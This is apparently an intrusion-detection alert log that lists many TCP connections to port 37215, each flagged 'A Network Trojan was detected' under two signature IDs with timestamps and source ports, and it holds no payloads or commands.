                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420838
                SID:2835222
                Source Port:35718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806467
                SID:2829579
                Source Port:51752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647361
                SID:2829579
                Source Port:57832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074413
                SID:2829579
                Source Port:54962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683192
                SID:2835222
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616576
                SID:2829579
                Source Port:39238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324415
                SID:2835222
                Source Port:45416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705628
                SID:2835222
                Source Port:57484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941675
                SID:2829579
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423783
                SID:2835222
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647069
                SID:2829579
                Source Port:43852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087247
                SID:2835222
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724019
                SID:2835222
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827681
                SID:2835222
                Source Port:40674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803270
                SID:2835222
                Source Port:46430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227718
                SID:2829579
                Source Port:59810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243793
                SID:2835222
                Source Port:48748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944090
                SID:2829579
                Source Port:39846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810672
                SID:2835222
                Source Port:34486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803379
                SID:2829579
                Source Port:47564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763498
                SID:2829579
                Source Port:40340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411297
                SID:2829579
                Source Port:47474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201709
                SID:2835222
                Source Port:41672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614303
                SID:2829579
                Source Port:51412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520095
                SID:2829579
                Source Port:38790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860099
                SID:2835222
                Source Port:50164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381847
                SID:2829579
                Source Port:53606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715885
                SID:2835222
                Source Port:52380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012961
                SID:2835222
                Source Port:41336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568080
                SID:2835222
                Source Port:53008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152358
                SID:2835222
                Source Port:43812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792859
                SID:2835222
                Source Port:42180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409924
                SID:2835222
                Source Port:53848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094290
                SID:2829579
                Source Port:51994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293504
                SID:2835222
                Source Port:58852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365403
                SID:2829579
                Source Port:58446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862158
                SID:2835222
                Source Port:59412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676161
                SID:2835222
                Source Port:46750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563158
                SID:2829579
                Source Port:42166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368293
                SID:2835222
                Source Port:39420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366562
                SID:2829579
                Source Port:39688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547103
                SID:2835222
                Source Port:47112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368657
                SID:2829579
                Source Port:47400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804781
                SID:2835222
                Source Port:54442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992177
                SID:2829579
                Source Port:36934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813053
                SID:2829579
                Source Port:50756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014559
                SID:2829579
                Source Port:42412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243839
                SID:2829579
                Source Port:45690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735486
                SID:2829579
                Source Port:32868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766014
                SID:2835222
                Source Port:39288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677276
                SID:2835222
                Source Port:35664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563641
                SID:2829579
                Source Port:60328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967678
                SID:2835222
                Source Port:48494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182386
                SID:2835222
                Source Port:51496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811361
                SID:2829579
                Source Port:38440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052072
                SID:2829579
                Source Port:49476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729792
                SID:2829579
                Source Port:38100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683103
                SID:2835222
                Source Port:34652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338717
                SID:2829579
                Source Port:47032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969177
                SID:2835222
                Source Port:59472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776406
                SID:2835222
                Source Port:42932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292162
                SID:2835222
                Source Port:35742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134521
                SID:2835222
                Source Port:59890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763816
                SID:2829579
                Source Port:56218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661762
                SID:2829579
                Source Port:55782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324683
                SID:2829579
                Source Port:60716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228566
                SID:2835222
                Source Port:37970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452498
                SID:2835222
                Source Port:39722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725755
                SID:2835222
                Source Port:57860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807392
                SID:2829579
                Source Port:52972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053004
                SID:2835222
                Source Port:45196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881857
                SID:2835222
                Source Port:34716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.334682
                SID:2835222
                Source Port:34304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074042
                SID:2829579
                Source Port:44322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150342
                SID:2829579
                Source Port:59420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150974
                SID:2835222
                Source Port:59980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703869
                SID:2829579
                Source Port:54934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114018
                SID:2829579
                Source Port:32816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716269
                SID:2829579
                Source Port:37842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185843
                SID:2829579
                Source Port:59696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146071
                SID:2835222
                Source Port:34960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054404
                SID:2829579
                Source Port:42226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023711
                SID:2829579
                Source Port:49786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133267
                SID:2829579
                Source Port:36128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083796
                SID:2829579
                Source Port:59702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716667
                SID:2835222
                Source Port:50606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199081
                SID:2829579
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151337
                SID:2835222
                Source Port:55592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471148
                SID:2835222
                Source Port:50440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549174
                SID:2835222
                Source Port:41440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181306
                SID:2829579
                Source Port:57498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944606
                SID:2835222
                Source Port:59342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830298
                SID:2829579
                Source Port:55526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.278071
                SID:2829579
                Source Port:54748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322841
                SID:2829579
                Source Port:43430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367914
                SID:2829579
                Source Port:33498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859219
                SID:2835222
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967660
                SID:2835222
                Source Port:39532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803302
                SID:2829579
                Source Port:39504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294034
                SID:2835222
                Source Port:39530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617344
                SID:2835222
                Source Port:50352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977251
                SID:2835222
                Source Port:56402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661155
                SID:2835222
                Source Port:48094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145730
                SID:2835222
                Source Port:49962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183671
                SID:2829579
                Source Port:46672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625266
                SID:2829579
                Source Port:34196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410627
                SID:2829579
                Source Port:52874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913659
                SID:2829579
                Source Port:38624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760598
                SID:2835222
                Source Port:38232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112097
                SID:2835222
                Source Port:39180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684021
                SID:2829579
                Source Port:36670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726923
                SID:2835222
                Source Port:46378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152662
                SID:2829579
                Source Port:49518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618248
                SID:2829579
                Source Port:50214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676877
                SID:2835222
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253131
                SID:2829579
                Source Port:53676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012372
                SID:2829579
                Source Port:43328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663685
                SID:2829579
                Source Port:42332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519435
                SID:2835222
                Source Port:51996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614066
                SID:2829579
                Source Port:43648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733530
                SID:2835222
                Source Port:35036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421355
                SID:2835222
                Source Port:35536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544052
                SID:2829579
                Source Port:45684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133822
                SID:2829579
                Source Port:44670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544168
                SID:2829579
                Source Port:55308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643489
                SID:2829579
                Source Port:48176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776589
                SID:2835222
                Source Port:44842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777230
                SID:2835222
                Source Port:35486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779592
                SID:2829579
                Source Port:39614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772401
                SID:2835222
                Source Port:59784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028594
                SID:2829579
                Source Port:38434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943255
                SID:2835222
                Source Port:37128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028744
                SID:2835222
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669575
                SID:2829579
                Source Port:37264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321197
                SID:2835222
                Source Port:44192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293145
                SID:2829579
                Source Port:35508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736520
                SID:2829579
                Source Port:54858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421875
                SID:2829579
                Source Port:58446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807485
                SID:2829579
                Source Port:41404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368799
                SID:2835222
                Source Port:58778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805270
                SID:2835222
                Source Port:57250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717738
                SID:2829579
                Source Port:51400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915483
                SID:2829579
                Source Port:42224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052490
                SID:2829579
                Source Port:37724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149063
                SID:2829579
                Source Port:42188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548471
                SID:2835222
                Source Port:54238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807655
                SID:2835222
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164847
                SID:2829579
                Source Port:53444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999297
                SID:2829579
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689131
                SID:2835222
                Source Port:57510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718923
                SID:2829579
                Source Port:32768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242572
                SID:2829579
                Source Port:35300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367670
                SID:2829579
                Source Port:40162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519069
                SID:2829579
                Source Port:50114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645739
                SID:2835222
                Source Port:33286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325705
                SID:2835222
                Source Port:43488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470383
                SID:2835222
                Source Port:50408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663363
                SID:2835222
                Source Port:46516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790177
                SID:2829579
                Source Port:57428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972329
                SID:2835222
                Source Port:39440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542550
                SID:2835222
                Source Port:34244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322983
                SID:2829579
                Source Port:51500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969296
                SID:2835222
                Source Port:53584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762373
                SID:2829579
                Source Port:42068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548851
                SID:2829579
                Source Port:44048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184294
                SID:2829579
                Source Port:38540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245432
                SID:2835222
                Source Port:41052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322943
                SID:2829579
                Source Port:54892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200625
                SID:2829579
                Source Port:44024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200312
                SID:2835222
                Source Port:46360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943937
                SID:2835222
                Source Port:50028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879619
                SID:2835222
                Source Port:38332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899151
                SID:2829579
                Source Port:54834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775594
                SID:2835222
                Source Port:33472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056414
                SID:2829579
                Source Port:47086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699175
                SID:2829579
                Source Port:47400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705504
                SID:2829579
                Source Port:56794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143418
                SID:2835222
                Source Port:51096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134139
                SID:2835222
                Source Port:44194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181765
                SID:2829579
                Source Port:45662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792475
                SID:2829579
                Source Port:41914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736475
                SID:2835222
                Source Port:53502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849164
                SID:2829579
                Source Port:52782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115571
                SID:2829579
                Source Port:44588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725141
                SID:2835222
                Source Port:56002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878032
                SID:2829579
                Source Port:34278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828057
                SID:2829579
                Source Port:40856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703727
                SID:2829579
                Source Port:37134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111857
                SID:2835222
                Source Port:58144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024051
                SID:2835222
                Source Port:37176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565486
                SID:2829579
                Source Port:48466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548606
                SID:2835222
                Source Port:35988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763424
                SID:2829579
                Source Port:42648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339516
                SID:2835222
                Source Port:59818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804618
                SID:2829579
                Source Port:53078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420964
                SID:2829579
                Source Port:37112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701279
                SID:2829579
                Source Port:60930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
